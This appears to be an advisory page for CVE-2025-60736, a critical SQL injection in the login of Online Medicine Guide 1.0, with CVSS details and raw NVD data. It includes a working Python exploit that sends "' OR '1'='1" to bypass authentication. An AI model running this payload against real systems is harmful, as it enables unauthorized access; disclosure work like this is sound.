Security Vulnerability Report
中文
CVE-2025-60736 CVSS 9.8 CRITICAL

CVE-2025-60736

Published: 2025-12-02 19:15:51
Last Modified: 2025-12-05 18:56:41

Description

code-projects Online Medicine Guide 1.0 is vulnerable to SQL Injection in /login.php via the upass parameter.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:anisha:online_medicine_guide:1.0:*:*:*:*:*:*:* - VULNERABLE
code-projects Online Medicine Guide 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-60736 SQL Injection PoC # Target: code-projects Online Medicine Guide 1.0 # Vulnerability: SQL Injection in /login.php via upass parameter def exploit_sqli(target_url): """ SQL Injection exploit for CVE-2025-60736 This PoC demonstrates authentication bypass using SQL injection """ login_url = f"{target_url}/login.php" # Normal login attempt (for reference) normal_data = { 'uname': 'admin', 'upass': 'password' } # SQL Injection payload - bypass authentication # Using OR-based injection to bypass password check sqli_payload = { 'uname': 'admin', 'upass': "' OR '1'='1" } print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-60736: SQL Injection in login.php") # Try SQL injection try: response = requests.post(login_url, data=sqli_payload, timeout=10) print(f"[+] Sent SQL injection payload: {sqli_payload['upass']}") print(f"[+] Response status: {response.status_code}") if 'login' not in response.text.lower() or 'failed' not in response.text.lower(): print("[+] Authentication bypass successful!") print("[+] Attacker can gain unauthorized access to the system") else: print("[-] Exploitation may require payload adjustment") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-60736.py <target_url>") print("Example: python cve-2025-60736.py http://localhost/medicine") sys.exit(1) target = sys.argv[1].rstrip('/') exploit_sqli(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60736", "sourceIdentifier": "[email protected]", "published": "2025-12-02T19:15:51.263", "lastModified": "2025-12-05T18:56:40.780", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "code-projects Online Medicine Guide 1.0 is vulnerable to SQL Injection in /login.php via the upass parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anisha:online_medicine_guide:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "66C19956-0E83-4671-B35F-147277D21E15"}]}]}], "references": [{"url": "https://github.com/WinDyAlphA/CVE-2025-60736", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}